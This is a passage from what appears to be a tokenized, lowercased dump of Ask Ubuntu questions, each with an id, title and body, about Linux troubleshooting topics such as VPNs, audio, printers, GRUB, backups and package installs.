mast , auto or none protostack=netkey conn % default keyingtries=3 pfs=no rekey=yes type=transport left= % defaultroute leftprotoport=17/1701 rightprotoport=17/1701 # add connections here . ipsec.secrets > is empty the vpn manager logs show > aug 21 18:56:30.789 ipsec_setup : stopping openswan ipsec ... aug 21 18:56:32.206 stopping xl2tpd : xl2tpd . aug 21 18:56:32.206 xl2tpd [ 1307 ] : death_handler : fatal signal 15 received aug 21 18:56:32.216 < b > recvref [ 30 ] : protocol not available < /b > aug 21 18:56:32.217 < b > xl2tpd [ 5487 ] : this binary does not support kernel l2tp. < /b > aug 21 18:56:32.217 xl2tpd [ 5488 ] : xl2tpd version xl2tpd-1.3.6 started on witty105 pid:5488 aug 21 18:56:32.218 xl2tpd [ 5488 ] : written by mark spencer , copyright ( c ) 1998 , adtran , inc. aug 21 18:56:32.218 xl2tpd [ 5488 ] : forked by scott balmos and david stipp , ( c ) 2001 aug 21 18:56:32.218 xl2tpd [ 5488 ] : inherited by jeff mcadams , ( c ) 2002 aug 21 18:56:32.220 xl2tpd [ 5488 ] : forked again by xelerance ( www.xelerance.com ) ( c ) 2006 aug 21 18:56:32.220 xl2tpd [ 5488 ] : listening on ip address 0.0.0.0 , port 1701 aug 21 18:56:32.220 starting xl2tpd : xl2tpd . aug 21 18:56:33.659 xl2tpd [ 5488 ] : connecting to host vpn.obeohealth.com , port 1701 aug 21 18:56:38.665 xl2tpd [ 5488 ] : maximum retries exceeded for tunnel 47541 . closing . aug 21 18:56:38.665 [ error 410 ] connection attempt to 'myco-vpn ' timed out aug 21 18:56:38.667 xl2tpd [ 5488 ] : connection 0 closed to 50.*** . ***.205 , port 1701 ( timeout ) aug 21 18:56:38.676 stopping xl2tpd : xl2tpd . aug 21 18:56:38.676 xl2tpd [ 5488 ] : death_handler : fatal signal 15 received these lines are are self explanatory recvref [ 30 ] : protocol not available xl2tpd [ 5487 ] : this binary does not support kernel l2tp . kernel : [ 4417.877398 ] net : unregistered protocol family 15 so , how to l2tp ? if ubuntu desktop doesnt have support , which distro does ? tia
514251	how do i manage changing users in a charm ?	i 'm writing a charm in which i need to change user to install some packages . when i start juju-deploy all this running as root ... so , i try to change my user and is not possible . if anyone has any idea how to solve this , agradeceria ... i tried many things in the install script made ââin bash but i have not accomplished anything . i 'm try this ... this is a part of my install script on hooks directory : mkdir -p $ dir useradd -d `` $ dir '' -s `` $ bash '' -g `` $ group '' -- create-home $ user echo `` $ user : $ pass '' | chpasswd cp /etc/skel/.bash_logout /etc/skel/.bashrc /etc/skel/.profile $ dir su - `` $ user '' it is assumed that this part should change the user and continue running the script with the user created and not as root . but that is not happening
514252	install issue opengl mesa-10.2.6 can not find llvm shared libraries	so i was working on this one most of yesterday . i am trying to install the mesa3d opengl libraries on ubuntu 14.04 x64 . so i downloaded and installed the dependency for this install : llvm-3.4.2 . so that went through just fine . then i tried to install the mesa-10.2.6 package using a configuration script : ./configure make make install when i ran ./configure , i get an error checking for llvm-config ... /usr/local/bin/llvm-config checking for radeon ... yes checking for radeon ... yes configure : error : could not find llvm shared libraries : please make sure you have built llvm with the -- enable-shared option and that your llvm libraries are installed in /usr/local/lib if you have installed your llvm libraries to a different directory you can use the -- with-llvm-prefix= configure flag to specify this directory . note : mesa is attempting to use llvm shared libraries by default . if you do not want to build with llvm shared libraries and instead want to use llvm static libraries then add -- disable-llvm-shared-libs to your configure invocation and rebuild . so i am not sure how to fix this error . i tried point the configure script to the direction with ./configure -- with-llvm-prefix=/usr/local/bin but that did not work . i am not sure what else to do . any suggestions ?
514254	kindly explain to me what this script does	can someone kindly explain to me what this script does ? i am a newbie to scripting language . if [ $ # -eq 1 ] ; then declare -x config_file_dir= $ 1 thanks
514255	jack 's sound not working	i installed alsa and jack for using sooperlooper . alsa is working fine ( tried it with audacity ) , but when i connect something to system , capture or playback , it wo n't capture or play sound . here 's the output from the messages window when i start jack : ( i use a asus xonar ds ) 15:50:51.664 jack startet ... 15:50:51.664 /usr/bin/jackd -ndebianus -p10 -t2000 -dalsa -r48000 -p128 -n2 -d -chw:0,0 -phw:0,0 -zr can not connect to server socket err = datei oder verzeichnis nicht gefunden can not connect to server request channel jack server is not running or can not be started 15:50:51.675 jack wurde mit pid = 6115 gestartet . no message buffer overruns no message buffer overruns no message buffer overruns jackdmp 1.9.9 copyright 2001-2005 paul davis and others . copyright 2004-2012 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details jack server starting in realtime mode with priority 10 control device hw:0 control device hw:0 audio_reservation_init failed to acquire device name : audio0 error : method `` requestrelease '' with signature `` i '' on interface `` org.freedesktop.reservedevice1 '' does n't exist audio device hw:0,0 can not be acquired ... can not initialize driver jackserver : :open failed with -1 failed to open server 15:50:51.765 jack wurde angehalten mit r체ckgabewert = 255 . 15:50:51.887 jack-verbindung ge채ndert . 15:50:51.888 statistik zur체ckgesetzt . 15:50:51.908 client aktiviert 15:50:51.937 schaubild der jack-verbindungen ge채ndert .
514260	eclipse.desktop launcher in /usr/share/applications locked in dash just launches eclipse , but the window is opened in another icon	ubuntu unity opens a new icon in dash every time i open eclipse , do n't mind if i just execute it from the binary or if i created a desktop file . i also reset unity without exit .
514262	a command line output error generates while installing java on the system	archive : /home/gaurav/desktop/java/javasetup6u27.exe [ /home/gaurav/desktop/java/javasetup6u27.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . note : /home/gaurav/desktop/java/javasetup6u27.exe may be a plain executable , not an archive zipinfo : can not find zipfile directory in one of /home/gaurav/desktop/java/javasetup6u27.exe or /home/gaurav/desktop/java/javasetup6u27.exe.zip , and can not find /home/gaurav/desktop/java/javasetup6u27.exe.zip , period .
514264	install webserver on ubuntu desktop-problem when access external address	i have ubuntu 14.04.1 lts ( desktop ) and i would like to install a web server and have my own wordpress website . so , i installed lamp , then i checked whether apache2 works ( i typed on the browser http : // 192.168.1.5 ) and it works . however , as i understand this is the internal address of my pc ( i connect to the internet through wireless home router ) . when i try my external address ( currently is 213.16.159.224 ) a pop-up window emerges : authentication required a username and password are being requested by http : // 213.16.159.224 . the site says : `` zxhn h108l '' user name : password : what am i doing wrong ? thanks in advance
514265	is there a way to increase /dev/loop0 on ubuntu touch	i have ubuntu touch on a nexus 4 , but when i try to install some libraries i get an error saying that there is not enough space . i could see that the partition the system is using to install is /dev/loop0 which has only 2gb , and there is 11gb free on another partition . is there a way to increase/resize the /dev/loop0 ? i tried the losetup and resize2fs commands with no success .
514268	sound stops working on 14.04.1	i upgraded to 14.04.1 lts last week and i am having a problem with the sound . if i let the computer sit for a while ( i havenât figured min time but more than 30 minutes ) the sound quits working . i can `` reset '' it by testing the sound on each of the listed devices in the sound/output tab . i have the following devices listed : - hdmi / display port - digital output ( s/pdif ) - analog output i am using the analog output , do n't have an hdmi ( using dual output dvi card ) and i 'm not using the s/pdif since i 'm going straight to a samsung tv/monitor . any idea how to stop this ? i did n't have this problem in previous version ...
514269	ubuntu 12.04 - after update it boots in command line only ( no windows manager )	i have ubuntu 12.04 , which has been working great for me since i installed it a year ago . yesterday i ran the updates that update manager recommended . ( last time i ran updates before was about a week ago ) . after the updates were installed , it asked me to reboot . so i rebooted it , and then it stopped at login prompt ( as a command line , with no windows ) . i logged in and tried to manually start the windows manager , and the screen went blank , and stayed blank i waited several minutes , and then turned it off . how can i figure out what is the problem ? which logs should i check ? update : i checked /var/log/syslog and /var/log/lightdm/lightdm.log and i found an error message fatal : module nvidia_331_updates not found . so i tried to app-get it , and i listed all the nvidia packages , and apt-get says they are all already installed . see screenshot :
514274	why does 14.04 say there are no updates , when there are ?	why does update manager in 14.04 currently say it 's up-to-date when apt-get upgrade shows there are updates to install ?
514278	mate panel disappears while using libreoffice	when using libreoffice , if i click on a drop-down button ( not the file menu and so on , but for example the text colour palette ) and then click somewhere else , the mate panel will disappear until i run killall mate-panel . is there any way to solve this ? edit : i have confirmed that this happens for both libreoffice writer and calc with the font/highlighting colour selection button . edit2 : i have found the problem lies in composition and have submitted an answer to that effect .
514280	how does ubuntu software center determine the logo of a package ?	i want to know so that i can ensure when users search for my package in the software center it is displayed with the appropriate logo .
514284	how can i change the keyboard layout on login screen ?	i changed my keyboard layout from swedish to english , but now my password doesn’t work and i can’t login . i need a way to change the keyboard layout at the login screen without having access to the keyboard or a way to enter the password using characters not available on the keyboard itself .
514286	check if folder does not exist in tcsh	when using the tcsh shell , how do i check if a folder does not exist ? i can check if it exists by if ( -d /folder ) then but i want the if statement to work for folders that do n't exist .
514287	how do i determine which window-manager i am using ?	i have a problem with window manager not loading , so i have to deal with just command prompt . i 'm thinking about changing my window manager , but i switched them several times ( trying to decide which one i like best ) and i forgot which one i 'm currently using ... how do i determine from command which one i am using ?
514293	wireless usb keyboard and mouse not detected ubuntu 12.04	i am having a problem with my newest installation of ubuntu on my samsung chromebox . as soon as i boot into the computer , the mouse and keyboard are not recognized . mouse clicks/movement does not work . i can not type . both the mouse and keyboard are totally unresponsive . as soon as i grab a wired usb keyboard , the mouse works fine , but still not the keyboard . both devices are logitech .
514297	installing ubuntu on a blank machine	i 'm getting a new pc next month and let 's face it i'n mot paying all that money for windows to have it taken off straight away fro 14.04 , so i opted for no os . i have a usb stick with ubuntu 14.04 on it ( created by using lili live linux usb creator ) , if i plug this into the port , will it boot from the usb ? any help is appreciated , thanks in advance ! : d
514299	trouble using canon mg 2440 printer in ubuntu 14	i connected usb serial cable from printer to computer . the drivers has been installed automatically . i printed the test page - it was printed . i tryed to print an image - it stays with status - processing ... and dont work . test page also cant be printed . what a problem ? i dont know exactly , but i think i use `` cups '' manager and drivers ... now status waiting for printer to become available . and do not print .
514302	error installing japanese game on lubuntu	so , i have a .iso file for a japanese game . so i used furious iso mounter to mount the image , and used wine loader to install the game , but when i try , there 's this small windows with two options , most likely yes and no , with weird symbols and squares in the area there shoudl be text . i installed japanese language , but does n't work . i got the fake japanese for winetrick , but i 'm not sure how to use this . does anyoneno know how to fix this problem ? ? thank you .
514303	ubuntu and virtualbox	i have the following configuration , a host running windows 7 ; a guest running ubuntu 14.04 lts ( virtualbox ) ; i am connecting a cisco router directly to my pc running windows 7 and testing the router for netflow packets in the virtualbox i am having a difficulty capturing the traffic of the netflow from the cisco device in my virtualbox using port 2222 . i tried to use the many different networking modes provided by virutalbox ( i.e . nat , bridged adapter , host only adapter ) but i am not successful in capturing the netflow traffic . could you please advise me on the configuration setup that need to be done on the virtual box to allow capturing the traffic coming from the router . i successfully capture the netflow traffic on my pc ( windows 7 ) . thank you
514304	installing ubuntu on hcl connect v3	i am using hcl connect v3 tablet . is there possibility to install a ubuntu on my device ?
514305	install python 2.7.8 on ubuntu 12.04	i have to use ubuntu 12.04 for some reason . in the other hand , i have to use python 2.7.8 but the newest python version for 12.04 is 2.7.3 . is there any ppa repository i can use to upgrade my python or other simple way to do this ? thanks in advance..
514306	prevent apt from overwriting custom files	my server runs a java application that requires i replace a few java library files with ones i downloaded on my own . this has to do with jce security extensions and is n't really relevant to my question . i 've found that these library files tend to get overwritten by apt when it later updates my java package . is there an apt-friendly way of masking these specific files so apt wo n't touch them ? potential solutions i 'm considering just removing the write flag from the files , though i 'm expecting this will cause apt to spew its guts everywhere when it later tries to overwrite them ? perhaps there 's a java custom library directory i do n't know of , where i can park my files and they 'll be loaded instead of the package 's defaults ? the last-resort option i 'm considering is writing a cron job to periodically replace the files with my versions . i hate this option .
514310	why do i have question marks instead of ordinary icons ?	some applications produce question marks for their subwindows in the unity menu instead of ordinary icons . what could cause this behaviour ?
514311	find an e-mail in the system and remove , that appears in logs	i have a problem on my ubuntu server . some guy has added his e-mail somewhere and my server tries to send him e-mails . i have searched using grep : /var/log # grep -n `` guys_name @ gmail.com '' * and got this : syslog.1:6538 : aug 21 03:39:54 lovecakes postfix/smtp [ 24625 ] : a49a315a951 : to= < guys_name @ gmail.com > , relay=gmail-smtp-in.l.google.com [ 64.233.165.27 ] :25 , delay=2.9 , delays=1.2/0/0.46/1.2 , dsn=2.0.0 , status=sent ( 250 2.0.0 ok 1408585194 wr8si36296852lbc.79 - gsmtp ) syslog.1:6864 : aug 21 04:32:18 lovecakes postfix/smtp [ 24949 ] : a04a215a951 : to= < guys_name @ gmail.com > , relay=gmail-smtp-in.l.google.com [ 2a00:1450:4010 : c08 : :1a ] :25 , delay=12 , delays=10/0.01/0.4/1.6 , dsn=2.0.0 , status=sent ( 250 2.0.0 ok 1408588338 t1si36397231laj.89 - gsmtp ) syslog.1:6990 : aug 21 04:50:56 lovecakes postfix/smtp [ 25071 ] : 0d54315a951 : to= < guys_name @ gmail.com > , relay=gmail-smtp-in.l.google.com [ 2a00:1450:4010 : c08 : :1b ] :25 , delay=3.1 , delays=1.4/0/0.34/1.3 , dsn=5.7.1 , status=bounced ( host gmail-smtp-in.l.google.com [ 2a00:1450:4010 : c08 : :1b ] said : 550-5.7.1 [ 2a01:4f8 : d15:1fc4 : :2 12 ] our system has detected that this 550-5.7.1 message is likely unsolicited mail . to reduce the amount of spam sent 550-5.7.1 to gmail , this message has been blocked . please visit 550-5.7.1 http : //support.google.com/mail/bin/answer.py ? hl=en & answer=188131 for 550 5.7.1 more information . c2si36483814lac.0 - gsmtp ( in reply to end of data command ) ) my aliases is clean : # vim /etc/aliases and i do n't know where to find his entry and remove it , so that my server stops trying to send him e-mails .
514312	is there a way to have clementine normalize my music ?	i 've got two related music files/albums . however they are at different volumes . any idea as to how to fix this ? i have tried going into preferences -- - > playback and hitting replay gain however that seemed to have no effect .
514313	transcode to aac on ubuntu 14.04 using vlc	i am trying to stream a dvb stream in vlc but transcoding the audio to aac format however it ca n't find the encoder . how do i install it ? vlc media player 2.1.4 rincewind ( revision 2.1.4-0-g2a072be ) [ 0x2535b58 ] main interface error : no suitable interface module [ 0x2470118 ] main libvlc error : interface `` globalhotkeys , none '' initialization failed [ 0x2535b58 ] dbus interface error : failed to connect to the d-bus session daemon : unable to autolaunch a dbus-daemon without a $ display for x11 [ 0x2535b58 ] main interface error : no suitable interface module [ 0x2470118 ] main libvlc error : interface `` dbus , none '' initialization failed [ 0x2470118 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0x2535b58 ] qt4 interface error : could not connect to x server [ 0x2535b58 ] skins2 interface error : can not initialize osfactory [ 0x2535b58 ] [ cli ] lua interface : listening on host `` *console '' . vlc media player 2.1.4 rincewind command line interface initialized . type `help ' for help . > [ 0x7f00c800bcf8 ] dtv access error : 514000 hz carrier frequency is too low . [ 0x7f00c800bcf8 ] dtv access : assuming 514000000 hz frequency instead . [ 0x7f00c800bcf8 ] dtv access error : can not enumerate frontend systems : invalid argument [ 0x7f00cc001138 ] avcodec encoder error : can not open encoder [ 0x7f00cc001138 ] main encoder error : streaming / transcoding failed [ 0x7f00cc001138 ] main encoder error : vlc could not open the encoder . [ 0x7f00c80097c8 ] stream_out_transcode stream out error : can not find audio encoder ( module : any fourcc : mp4a ) . take a look few lines earlier to see possible reason . [ 0x7f00c80097c8 ] stream_out_transcode stream out error : can not create audio chain [ 0x7f00c80a5438 ] main decoder error : can not create packetizer output ( mpga ) [ 0x7f00c80105b8 ] ts demux error : libdvbpsi ( misc psi ) : bad crc_32 table 0x73 ! ! ! edit to add the command i 'm running cvlc -- ttl 12 -- ts-es-id-pid -- program=8261 dvb : // -- dvb-adapter=3 \ -- dvb-frequency=514000 -- dvb-bandwidth=8 -- sout # transcode { width=720 , vcodec=h264 , venc=x264 { aud , profile=baseline , level=30 , keyint=30 , ref=1 } , acodec=mp4a } : std { access=livehttp { seglen=10 , delsegs=true , numsegs=10 , index=/web/main/streaming/mystream.m3u8 , index-url=http : //192.168.1.2/streaming/mystream- # # # # # # # # .ts } , mux=ts { use-key-frames } , dst=/web/main/streaming/mystream- # # # # # # # # .ts } ' the command is to stream a dvb adapter over hls transcoding it to a format accepted by the client . the command works but will produce ts files that have no audio due to the missing encoder . if i chnage the encoder to `` mp3 '' i get a file with mp3 audio but obviously not what i want .
514314	is there a way to open an `` extra '' temporary workspace ( via terminal , preferably ) ?	[ running ubuntu 14.04 , unity ] so , i have workspaces enabled and all that jazz . i know one can set some option so that ubuntu defaults to more than four workspacesâbut that 's not what i want . currently , i 'd like a fifth workspace , but only temporarily ( that is , i do n't want it to be the default that five open . i just want it for today , and possibly w/e other day i need it ) . is there a way to do this ?
514321	how to stop services from autostart which runs on port 902 , 3128 ?	am using ubuntu 14.04. given below my nmap result , nmap -sv -n 192.168.1.7 starting nmap 6.40 ( http : //nmap.org ) at 2014-08-21 22:12 ist stats : 0:00:01 elapsed ; 0 hosts completed ( 1 up ) , 1 undergoing syn stealth scan syn stealth scan timing : about 1.00 % done ; etc : 22:13 ( 0:01:39 remaining ) nmap scan report for 192.168.1.7 host is up ( 0.000014s latency ) . not shown : 995 closed ports port state service version 21/tcp open ftp vsftpd 2.0.8 or later 22/tcp open ssh ( protocol 2.0 ) 80/tcp open http apache httpd 2.4.7 ( ( ubuntu ) ) 902/tcp open ssl/vmware-auth vmware authentication daemon 1.10 ( uses vnc , soap ) 3128/tcp open http-proxy squid http proxy 3.3.8 1 service unrecognized despite returning data . if you know the service/version , please submit the following fingerprint at http : //www.insecure.org/cgi-bin/servicefp-submit.cgi : sf-port22-tcp : v=6.40 % i=7 % d=8/21 % time=53f62172 % p=x86_64-pc-linux-gnu % r ( null sf : ,29 , '' ssh-2\.0-openssh_6\.6\.1p1\x20ubuntu-2ubuntu2\r\n '' ) ; service info : host : vsftpd i need to stop all services from autostart . and i do n't know what is the service names for `` ssl/vmware-auth '' and `` http-proxy '' when i try below command as root , to stop service i get error $ service http-proxy stop http-proxy : unrecognized service and i tried below command to disable auto start , but does n't work . $ update-rc.d -f ssh remove removing any system start up links for /etc/init.d/ssh ... it shows working , but after reboot again ports are open ! ! my runlevel : n 2 so i checked inside the folder , /etc/rc2.d/ but could't see the service names . 1 ) how to find out the exact service names 2 ) how to stop the above services from auto start ?
514322	file mod date in iso ?	i want to return a file modification date in a bash script , in iso format ( yyyy-mm-dd ) what shell command will get the modification timestamp , similar to how filemtime does in php ?
514327	hp envy 5530 and linux ubunu 14.04	i ca n't install hp envy 5530 using usb cable in ubuntu 14.04 .
514329	configure ssi for localhost	i 'm trying to use ssis to append a single copy of a jquery mobile collapsible to multiple divs . they can not be cloned , and jquery get/prepend is not working , so i 'm resorting to this . i have pointed apache2.conf to httpd.conf in the same directory . in httpd.conf i have : # < directory /var/www/ > options +includes xbithack on # < /directory > with and without # or /var/www/ . i have set the file with this failing ssi code < ! -- # echo var= '' date_local '' -- > to executable in a subdirectory . i am on 13.10 . the ip of apache has n't been set and defaults to 127.0.0.1 . i have changed the port to 8080 . otherwise , i have changed nothing . i access the server via http : //localhost:8080 . how can my intent be implemented ?
514332	usb to uart adapter works with delays on ubuntu	i have bought a usb to uart adapter with the ch341a chip on it . i 'd rather mention that this adapter is polyfunctional ; it can be used as an usb to uart adapter , as a 24/25 chip programmer and as an usb to paralel adapter . the problem is with the uart adapter . i can use it without any problems in windows ( any , but drivers are required ) , but not correctly in ubuntu . when i plugged it in , ubuntu installed the driver . i shorted rx and tx to test it and in minicom it gave me back the letters i 've pressed but with significant delays . i also tested it on some ovislink router . i was able to read the output but the the delays blocked the last lines the router was writing . even worse : when i try to write something i have to refresh ( i mean , to put the lines i 've written higher ( by i.e . pressing enter ) ) the console . so basically i 'm able to read the output but not the last few lines and i 'm not able to correctly write to the terminal . i repeat i can use this adapter correctly in windows so it 's ubuntu 's issue . i 'm running ubuntu 14.04. dmesg + lsusb : http : //i.stack.imgur.com/dgif7.png minicom : http : //i.stack.imgur.com/gc0ym.png ( it does n't allow me to post pics )
514334	encrypt home directory / lvm encryption - ubuntu server 14.04 setup	there seems to be two different steps in the ubuntu server 14.04 installation that involve encryption . the first asks if i want to encrypt my home directory : the second has an option for encrypted lvm : are these two different encryption procedures ? if i do both is my drive doubly encrypted ? why would i do one and not the other ? i do n't think this is a duplicate of when installing i 'm given the option of encrypting my home folder -- what does this do ? because that solution does not explain why there are seemingly two encryption steps being offered .
514337	gnome 3 - strange black areas inside windows	i 'm facing a strange issue after upgrading from ubuntu 13.10 to 14.04 ( well , technically , it was n't an upgrade , as the network upgrade failed and i had to do a clean install ) . on many application windows , there are black areas , sometimes taking up the entire background of the window , sometimes only portions of it . this issue occurs on all gtk+ and window themes . i 'm using gnome 3.12.2 , running on an ati mobility radeon hd 4570 graphics card .
514342	cups is n't allowed to access sssd for authentication	i 'm running ubuntu 14.04 . the cups server requires authentication for all print jobs . if i send a job as a domain user i get the following errors . any help would be appreciated . i ca n't find anything about this particular error . /var/log/auth.log aug 20 14:36:44 machine1 cupsd : pam_unix ( cups : auth ) : authentication failure ; logname= uid=0 euid=0 tty=cups ruser= rhost=localhost user=name. # aug 20 14:36:44 machine1 cupsd : pam_sss ( cups : auth ) : request to sssd failed . permission denied aug 20 14:36:52 machine1 cupsd : pam_unix ( cups : auth ) : authentication failure ; logname= uid=0 euid=0 tty=cups ruser= rhost=localhost user=name. # aug 20 14:36:52 machine1x cupsd : pam_sss ( cups : auth ) : request to sssd failed . permission denied ... /var/log/cups/error_log e [ 20/aug/2014:14:40:37 -0400 ] [ client 16 ] pam_authenticate ( ) returned 7 ( authentication failure ) e [ 20/aug/2014:14:40:44 -0400 ] [ client 16 ] pam_authenticate ( ) returned 7 ( authentication failure ) ... /etc/cups/cupsd.conf loglevel warn maxlogsize 0 port 631 listen /var/run/cups/cups.sock browsing off browselocalprotocols dnssd defaultauthtype basic defaultpolicy authenticated webinterface yes < location / > order allow , deny allow from all < /location > < location /admin > order allow , deny allow from all < /location > < location /admin/conf > authtype default require user @ system order allow , deny allow from all < /location > < policy default > ... < /policy > < policy authenticated > ... < /policy > /etc/sssd/sssd.conf [ sssd ] config_file_version = 2 services = nss , pam domains = domain.com [ nss ] nss_filter_groups = root nss_filter_users = root nss_entry_cache_timeout = 30 nss_enum_cache_timeout = 30 [ domain/domain.com ] id_provider = ad auth_provider = ad access_provider = ad chpass_provider = ad ad_domain = domain.com ldap_id_mapping = false ldap_schema = ad pwd_expiration_warning = 14
514347	restore grub after wrinting mbr with easybcd	i had dual boot system with win7 and ubuntu 14.04 . for some reason i had to reinstall linux so i booted in windows and removed grub by reinstalling mbr from easybcd . i then reformatted and reinstalled ubuntu 12.04 with grub in complete drive ( ie /dev/sda and not on /dev/sdax ) . but now computer is only booting in to windows . i added linux into boot menu of windows using easybcd but no avail . i have already tried reinstalling and adding linux from easybcd ... sigh , no avail .
514348	errors updating ubuntu 12.04 lts	i get failed to fetch 404 errors by updating my ubuntu 12.04 lts . i think my proxy is configured well : etc/environment http_proxy= '' http : //webproxy:81/ '' furthermore i tried to update from different servers in terms of downtime , but that also did n't help me out . could it be , that ubuntu 12.04 lts is n't supported anymore for this updates or what i can do to fix this ? because i think that the updates are very important for security i really do n't want to ignore it . w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/main/binary-amd64/packages 404 not found , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-amd64/packages 404 not found , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/universe/binary-amd64/packages 404 not found , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-i386/packages 404 not found , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/main/binary-i386/packages 404 not found , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-i386/packages 404 not found , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/universe/binary-i386/packages 404 not found , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/main/i18n/index no sections in release file /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_precise-security_main_i18n_index , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/main/i18n/index no sections in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_i18n_index , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/index no sections in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_index , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/restricted/i18n/index no sections in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_index , w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/universe/i18n/index no sections in release file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_index , e : some index files failed to download . they have been ignored , or old ones used instead .
514350	adding a 'network ' usb printer	i have a hp deskjet 1050a printer , hence the 'network ' in the title . its a bog standard usb home printer . i have it attached to my router ( has a usb port in it ) . i have got it connected and working to with win8 pc and also a macbook air . ca n't seem to get it to add as a printer to my xubuntu laptop ( s ) . it does n't get detected automatically ( not an actual network printer ) and i 've tried multiple options to get it working . it seems to add it but when printing a test page its saying the printer is n't connected . ping works fine so it can see it , just ca n't add it as a printer . with win8 i had to create a port with the ip of the printer ( 192.168.1.253 in this case ) , is there an ubuntu alternative to do this ?
514351	what does the gradient stripes section mean in the libre office print preferences ?	i guess that reduce gradient means that it is n't as high quality , but what is the option for gradient stripes or intermediate colour ?
514355	how do you image ubuntu 12.04 and 14.04 installations for restoration ?	i want to do a clean install of ubuntu and then create an image that i can use to restore the system to a clean state after i 've tested the installation and use of an app within ubuntu . but all i 'm finding is cloning , which does n't do what i want . i do n't want to clone my drive . i want to be able to run a test and then restore from an image so that everything is exactly as it was before i started the test . basically this is what i need to do : install ubuntu 12.04 . create an image of 12.04 that i store somewhere else . reformat the drive and install 14.04 . create an image of 14.04 that i store somewhere else . erase the hard disk and restore the 12.04 image . install the application i 'm testing to find issues . erase the hard disk and restore the 12.04 image . reinstall the application i 'm testing to find issues during other install options . erase the hard disk and restore the 12.04 image . reinstall the application i 'm testing to find issues that may arise from different application configurations . and repeat . and repeat . and repeat . from what i 'm reading , cloning is primarily for servers to allow you to have a copy of the disk you 're using in the event of a failure . when it does fail , you switch to the clone to keep the server running while you 're repairing the disk . i want imaging because i need every starting state for each test to be identical to every other starting state so that i can figure out where problems are . if anything at all is different between the install of ubuntu i start with during one test and the install of ubuntu i start with during another , the test is invalid .
514356	remote rsnapshot failing with `` permission denied '' error	i 'm trying to set up remote backups with rsnapshot from my home server . i want my server to connect into my laptop and take backups over ssh.everything is set up correctly and i can connect from my server to the laptop perfectly . the problem is i 'm getting a permission error when i run sudo rsnapshot -v hourly ( from the server ) : ... rsync : opendir `` /foo/bar '' failed : permission denied ( 13 ) ... i 've created a separate backup user on my laptop and i 'm connecting over ssh with this user . this is my ~/.ssh/config that rsnapshot is making use of : host macbookpro hostname macbookpro preferredauthentications publickey user backup identity file ~/.ssh/keys/macbookpro.id_rsa i 've also added the following to my sudoers file on my laptop which should allow rsync to run as root when called remotely by rsnapshot : backup all= ( root ) nopasswd : /usr/bin/rsync yet whenever i run rsnapshot i continue to get permission errors . does anyone see what 's wrong ?
514357	what 's the purpose of the ubuntu online accounts extension in firefox ?	on my ubuntu 14.04 , there is a firefox extension `` ubuntu online accounts 0.5 '' , installed by the package xul-ext-webaccounts ( which is in the default install ) . what is the purpose of this extension ? what will stop working if i disable it ? there seems to be no documentation in the package , the description page of the extension is basically empty , and the only link points to https : //launchpad.net/webaccounts-browser-extension , on which i also can not find information on its purpose . of course i suspect it is related to the online accounts dialog in the system control center , however firefox is not listed as an application in that dialog , and when i visit a page such as twitter with firefox for which i have an account set up under online accounts , nothing happens .
514364	virtual box is not getting start	i had been using ubuntu 13.04 32-bit . after upgrading to ubuntu 13.10 my earlier installed virtual box ( from software center ) did not get started even after removing and reinstalling many times . could any one tell me the way to fix this ? in order to solve the problem , i upgraded to ubuntu 14.04 lts but the problem still persists even after reinstalling virtual box from software center . can anyone help me since i need virtual box ?
514369	how to recover data which was wiped out by ubuntu 14.04 using lvm	hi i am a naive user to ubuntu , i have a big problem with lvm as at the time of installation 14.04 i have checked lvm option to . somehow it 's wiped out all my windows drives and data too . how can i recover those data if anyone can help me then i will be highly thankful to that person . please help me out from this because i have lost my all important data : - (
514370	how to revert from 14.04 back to 12.04	my first ubuntu installation was 12.04 lts about a month ago on the desktop pc detailed below . this worked well but i forgot that if it works do n't try to fix it and i upgraded to 14.04 lts . unfortunately this gives frequent ... internal error ... messages and occasionally freezes . i was learning to live with these hiccups but the latest problem is that the graphics have some how degraded to looking quite `` chunky '' and movement of windows around the screen is very slow . my preferred solution for now would be to revert back from 14.04lts to 12.04lts . is this possible ? system details : processor : intel® core™2 quad cpu q6600 @ 2.40ghz × 4 graphics : vesa : g86 board - p403h10 monitor : flatron l225ws many thanks , arnie
514372	neverending issues with grub ( ubuntu 14.04 on asus with win8 dual boot )	this is the most frustrating issue i have ever run into using ubuntu and windows in the same machine . i have an asus k46cb , 6gb ram and preinstalled windows 8.1 64-bits . i have successfully installed ubuntu 14.04 lts , also 64-bits . to do so , i followed this tutorial whenever possible . i only failed on the disable secure boot part : there is no 'secure-boot ' or even uefi mention in my bios ! screenshots from other bios of the same model show the option under boot , but in mine there is absolutely none . because of this , i can not boot into ubuntu . the computer loads straight into windows . i tried running boot repair , but got an error ( i can show the log , but it 's pretty long ) . does anyone know how to fix this issue ? update i reinstalled ubuntu . same problem , goes straight to window . boot-repair informs me that i am using windows in legacy mode . it excecuted with no errors this time , but after restarting grub was still missing . i ca n't turn off secure boot yet . update i tried using boot repair to install grub on a bios-grub 1mb partition . still boots straight to windows . i feel like punching something update i reinstalled ubuntu with a bios-grub partition again , no luck . i forgot to add , there is also no ubuntu boot 